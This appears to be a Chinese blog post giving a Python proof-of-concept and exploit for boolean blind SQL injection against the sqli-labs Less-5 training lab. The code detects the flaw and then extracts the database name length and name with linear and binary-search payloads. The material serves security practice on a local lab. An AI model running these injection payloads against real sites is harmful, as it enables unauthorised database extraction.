poc练习-sqli-labs less5

sql盲注poc和exp,针对sqli-labs靶场的less5

poc检测是否存在sql盲注,exp获得数据库长度和库名,获得表名和字段名同理,只不过payload不一样,就不继续写了,exp中使用了二分查找能更快爆出库名
知识点:
线性查找(顺序查找)时间复杂度:N
二分查找时间复杂度:log(N)

'''
bool盲注:http://127.0.0.1/sqli-labs/Less-5/
判断是否存在基于bool的sql injection(blind)
poc编写:输出结果有或者没有
exp列出库名
'''
import requests
from time_decorator import time_wrapper   # 函数运行计时装饰器  可忽略


# 判断是否有bool盲注
def verify(url):
    payload1 = "?id=1' and 1=1 --+"
    payload2 = "?id=1' and 1=2 --+"
    resp1 = requests.get(url + payload1)
    resp2 = requests.get(url + payload2)

    text1 = resp1.text
    text2 = resp2.text
    if ('You are in' in text1) and ('You are in' not in text2):
        print(url, ':存在单引号闭合的sql注入(盲注)')
    else:
        print(url, ':不存在单引号闭合的sql注入(盲注)')


# 获得数据库长度
def get_dblength(url):
    for i in range(1, 20):
        payload = "?id=1' and length(database())={i} --+".format(i=i)
        res = requests.get(url + payload)
        if "You are in" in res.text:
            return i


# 获得数据库名,线性查找有点慢,需要6 7秒左右
# @time_wrapper
# def get_dbname(url, dblength):
#     dblist = []
#     dbstr = ""
#     for i in range(dblength):
#         for j in range(48, 122):
#             payload = "?id=1' and ascii(substr(database(),{i},1))={j} --+".format(i=i + 1, j=j)
#             res = requests.get(url + payload)
#             if "You are in" in res.text:
#                 dblist.append(j)
#                 break
#     for item in dblist:
#         dbstr += chr(item)
#     return dbstr


# 获得数据库名,二分查找更快,不到一秒
@time_wrapper
def get_dbname(url, dblength):
    dblist = []
    dbstr = ""
    for i in range(dblength):
        left = 48
        right = 122
        while True:
            mid = (left + right) // 2
            payload = "?id=1' and ascii(substr(database(),{i},1))>{mid} --+".format(i=i + 1, mid=mid)
            payload_mid = "?id=1' and ascii(substr(database(),{i},1))={mid} --+".format(i=i + 1, mid=mid)
            res = requests.get(url + payload)
            res_mid = requests.get(url + payload_mid)
            if "You are in" in res_mid.text:
                dblist.append(mid)
                break
            elif "You are in" in res.text:
                left = mid + 1
            elif "You are in" not in res.text:
                right = mid - 1
            # 防止while死循环
            elif right < left:
                break
    for item in dblist:
        dbstr += chr(item)
    return dbstr


if __name__ == '__main__':
    url = 'http://127.0.0.1/sqli-labs/Less-5/'
    verify(url)
    dblength = get_dblength(url)
    dbname = get_dbname(url, dblength)
    print(dbname)

函数计时装饰器

import time

# 一个函数装饰器 用于统计函数运行时间
def time_wrapper(fun):
    def time_count(*args, **kwargs):
        before_time = time.time()
        ret = fun(*args, **kwargs)
        current_time = time.time()
        print(f'函数运行总共用时:{current_time - before_time}秒')
        return ret

    return time_count

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值